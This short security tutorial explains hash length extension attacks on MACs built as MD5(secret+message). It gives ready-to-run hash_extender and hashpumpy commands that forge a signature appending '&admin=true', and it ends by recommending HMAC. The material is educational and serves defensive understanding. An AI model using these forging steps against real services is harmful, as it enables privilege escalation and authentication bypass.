Hash Length Extension Attack
Hash length extension attacks exploit the Merkle–Damgård construction in hashes like MD5, SHA-1, and SHA-256. If H(secret||message) is used as a MAC, attackers can compute H(secret||message||padding||extension).
Vulnerable Construction
```text
# Vulnerable MAC scheme
# signature = MD5(secret + message)

# Server verifies:
# - Takes user-provided message
# - Computes MD5(secret + message)
# - Compares with user-provided signature

# Attacker knows:
# - message (e.g., "user=guest")
# - signature = MD5(secret + "user=guest")
# - Does NOT know secret

# Attacker can compute:
# - MD5(secret + "user=guest" + padding + "&admin=true")
# - Without knowing the secret!
```

Exploitation with hash_extender
```bash
# Install hash_extender
git clone https://github.com/iagox86/hash_extender
cd hash_extender && make

# Usage
./hash_extender \
  --data "user=guest" \
  --secret-min 8 --secret-max 16 \
  --append "&admin=true" \
  --signature 5d41402abc4b2a76b9719d911017c592 \
  --format md5
# Output includes new signature and extended data
# Try each possible secret length

# Python alternative: hashpumpy
pip install hashpumpy
```

```python
import hashpumpy

# Sample values taken from the hash_extender call above
original_sig = "5d41402abc4b2a76b9719d911017c592"
original_data = "user=guest"
data_to_add = "&admin=true"
secret_length = 8

new_sig, new_data = hashpumpy.hashpump(
    original_sig,   # Known signature
    original_data,  # Known data
    data_to_add,    # Extension
    secret_length   # Guessed length
)
```

Fix: Use HMAC
Never use H(secret||message) as a MAC. Use HMAC-SHA256, which is not vulnerable to length extension attacks.